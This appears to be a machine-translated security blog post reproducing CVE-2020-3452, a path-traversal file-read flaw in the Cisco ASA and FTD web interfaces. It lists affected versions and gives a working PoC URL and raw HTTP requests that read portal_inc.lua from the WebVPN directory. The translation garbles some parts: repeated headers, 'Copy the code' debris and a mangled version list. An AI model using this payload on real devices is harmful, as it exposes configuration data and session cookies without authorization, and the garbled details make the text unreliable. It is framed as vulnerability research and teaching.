CISCO ASA Arbitrary File Read Vulnerability Reappears (CVE-2020-3452)
I. Vulnerability Description:
Cisco Adaptive Security Appliance (ASA)
The Web management interfaces of firewall devices and Cisco Firepower Threat Defense (FTD) devices have unauthorized directory traversal vulnerabilities and remote arbitrary file reading vulnerabilities. An attacker can only view files in the Web directory, but cannot access files outside the web directory. This vulnerability can view configuration information, cookies, and so on of webVpn devices.
Second, the scope of influence
The following are the system versions affected by the CVE-2020-3452 vulnerability:
Cisco ASA devices
The < 9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
Cisco FTD devices affected versions:
6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
< Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1
Third, vulnerability recurrence
POC:
/+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. /Copy the code
Detailed packet
GET /+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. / HTTP/1.1 Host: 127.0.0.1 Connection: close cache-control: max-age=0 upgrade-insecure -Requests: 1 user-agent: 127.0.0.1 Connection: close cache-control: max-age=0 upgrade-insecure -Requests: 1 user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/webp image/apng, * / *; Q = 0.8 Accept - Language: useful - CN, useful; Q = 0.9 cookies: webvpnlogin = 1; webvpnLang=enCopy the code
GET /+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. / HTTP/1.1 Host: 127.0.0.1 Content-length: 2Copy the codeCore path access is OK
Direct access means downloading the file to be accessed:
Reference:
Mp.weixin.qq.com/s/zm0NXfBQL…
www.cnblogs.com/potatsoSec/…
www.venustech.com.cn/article/1/1…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…